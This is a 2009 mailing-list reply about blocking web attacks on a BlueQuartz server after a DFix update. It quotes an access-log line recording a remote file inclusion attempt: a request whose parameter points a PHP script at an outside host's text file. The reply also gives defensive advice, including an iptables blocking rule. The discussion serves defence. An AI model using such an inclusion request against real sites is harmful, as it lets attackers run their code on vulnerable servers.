Article 15972 at 09/08/31 20:52:20 From: webhosting (at mark) yahoo.com Subject: [coba-e:15972] Re: DFix update

Index: [Article Count Order] [Thread]

Date:  Mon, 31 Aug 2009 04:52:17 -0700 (PDT)
From:  Dan Kriwitsky <webhosting (at mark) yahoo.com>
Subject:  [coba-e:15972] Re: DFix update
To:  coba-e (at mark) bluequartz.org
Message-Id:  <685800.81770.qm (at mark) web65612.mail.ac4.yahoo.com>
In-Reply-To:  <DGEPJONPLLICEMGPBFJDEENFCKAA.ka0jon (at mark) our-klan.com>
X-Mail-Count: 15972

> It's Now 10:45pm cst. I'm Still get this 1 minute
> intervals,
> 
> Warning: Blocking 2.sollink.net
> hamradio.our-klan.com 2.sollink.net - -
> [30/Aug/2009:14:48:26 -0500] "GET
> /index1.php?=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id
> 1.txt? HTTP/1.1" 404 2918 "-" "Mozilla/5.0"
> I even added "All : 65.18.168.84" to the hosts.deny

That doesn't block web access.

> 
> I just installed the update on my Bluequartz Server didn't
> reboot or
> anything.
> Wish I could email the IP Address.
> 

You could dig www.biig.net and get the IP and then do a whois on that IP and get the owner. Chances are they have misconfigured the uploads FTP directory and it's web accessible when it shouldn't be and being used to try to deliver that fx29id1.txt file to vulnerable sites.

Also, once you have the IP you could block it with:
iptables -I INPUT -s 12.34.56.789 -j DROP
Where 12.34.56.789 is the actual IP.

-- 
Dan Kriwitsky